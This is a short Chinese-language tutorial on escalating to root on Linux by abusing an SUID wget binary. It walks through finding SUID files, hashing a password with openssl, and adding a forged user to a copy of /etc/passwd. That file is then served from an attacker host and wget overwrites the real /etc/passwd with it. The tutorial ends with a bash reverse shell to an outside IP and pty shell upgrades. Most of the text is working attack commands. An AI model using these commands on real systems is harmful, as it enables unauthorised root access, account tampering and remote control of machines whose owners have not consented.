wget提权

一、获取权限

首先获取一个低权限

二、SUID

查看SUID能执行文件所有文件

#以下命令将尝试查找具有root权限的SUID的文件，不同系统适用于不同的命令，一个一个试

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000-print2>/dev/null

find / -user root -perm -4000-exec ls -ldb {} \;

三、passwd权限

查看/etc/passwd权限，如果可读，下载下来做个备份

四、伪造用户

本地创建一个用户名和密码

openssl passwd -1 -salt doufu doufu

五、追加用户

打开下载下来的passwd，追加一个用户

用户名 密码 用户ID 组ID 用户全名 主目录 登陆shell

六、添加用户

搭建一个网站服务，让受害机利用wget下载passwd，并覆盖原先的passwd 因为wget是root权限，下载下来并且创建的文件，就是root权限，所以能覆盖原本的文件

wget http://192.168.56.106:8000/passwd -O /etc/passwd

七、切换用户

su doufu

八、获取交互式shell

bash -i >& /dev/tcp/192.168.2.134/4444 0>&1

python -c 'import pty; pty.spawn("/bin/bash")'

python -c 'import pty; pty.spawn("/bin/sh")'

九、如果上面切换用户错误

python -c 'import pty; pty.spawn("/bin/bash")